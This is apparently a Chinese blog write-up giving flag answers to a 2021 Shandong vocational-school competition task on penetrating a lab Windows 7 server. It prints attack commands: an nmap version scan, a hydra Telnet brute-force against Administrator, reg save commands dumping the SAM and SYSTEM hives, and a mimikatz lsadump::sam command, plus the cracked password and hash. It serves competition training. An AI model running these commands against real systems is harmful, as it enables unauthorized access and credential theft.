2021年山东省中职组网络安全省赛B模块windows渗透解析
作者:互联网
B-10任务十:Windows操作系统渗透测试任务环境说明:●服务器场景:Server2(封闭链接)●服务器场景操作系统:Windows7
1.通过本地PC中渗透测试平台Kali对服务器场景进行系统服务及版本扫描渗透测试,并将该操作显示结果中Telnet服务对应的端口号作为FLAG提交;
首先第一道题目就非常简单,直接使用nmap -sV 版本扫描进行得出flag:
Flag:23
2.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为Administrator),将hydra使用的必要参数当做FLAG进行提交(例:nmap-s-p22);(字典路径/usr/share/wordlists/dirb/small.txt)
这一道题目那就使用hydra指定字典进行爆破:
Flag: hydra -l Administrator -P /usr/share/wordlists/dirb/small.txt 192.168.70.136 telnet
3.通过本地PC中渗透测试平台Kali对服务器场景进行渗透测试,使用kali中hydra对服务器Telnet服务进行暴力破解(用户名为Administrator),将破解成功的密码当做FLAG进行提交;(字典路径/usr/share/wordlists/dirb/small.txt)
根据上面的题目:
Flag:123
4.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中sam文件使用reg相关命令提取,将完整命令作为FLAG提交;
成功导出:
Flag:reg save HKLM\SAM sam.hive
5.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,取得的账户密码有远程桌面权限,将该场景系统中system文件使用reg相关命令提取,将完整命令作为FLAG提交;
根据上一道题目:
Flag:reg save HKLM\SYSTEM system.hiv
6.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取Administrator密码信息,将提取信息的命令作为FLAG提交;
Flag: lsadump::sam /sam:C:\sam.hive /system:C:\system.hiv
7.通过本地PC中渗透测试平台win7对服务器场景进行渗透测试,将sam文件与system文件提取到本地,使用桌面mimikatz工具提取administrators密码信息,将提取到的hash值作为FLAG提交
上一道题目得出:
Flag: 3dbde697d71690a769204beb12283678
标签:场景,PC,windows,中职,渗透,Flag,2021,测试,服务器 来源: https://blog.csdn.net/qq_57147160/article/details/121913891